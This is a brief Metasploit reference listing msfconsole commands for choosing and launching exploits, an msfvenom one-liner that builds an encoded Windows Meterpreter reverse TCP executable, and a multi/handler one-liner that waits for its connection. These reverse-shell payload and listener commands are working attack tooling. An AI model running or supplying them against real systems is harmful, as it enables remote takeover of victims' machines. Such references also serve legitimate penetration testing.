The Metasploit Framework is a powerful tool for penetration testing and exploit development. Below are common commands used within the Metasploit console (msfconsole) and for payload generation (msfvenom).
This section covers the fundamental steps to select, configure, and run an exploit.
# To show all exploits that match a vulnerability
grep <vulnerability> show exploits
# To select an exploit to use
use <exploit>
# To see the current settings for a selected exploit
show options
# To see compatible payloads for a selected exploit
show payloads
# To set the payload for a selected exploit
set payload <payload>
# To set a specific option for a selected exploit
set <option> <value>
# To run the exploit
exploit
msfvenom is used to generate standalone payloads. This example creates a Windows Meterpreter reverse TCP payload.
# One-liner to create/generate a payload for Windows
msfvenom --arch x86 --platform windows --payload windows/meterpreter/reverse_tcp LHOST=<listening_host> LPORT=<listening_port> --bad-chars "\x00" --encoder x86/shikata_ga_nai --iterations 10 --format exe --out /path/to/payload.exe
This command configures Metasploit to listen for incoming connections from a generated payload.
# One-liner to start a Meterpreter handler
msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST <listening_host>;set LPORT <listening_port>;run;"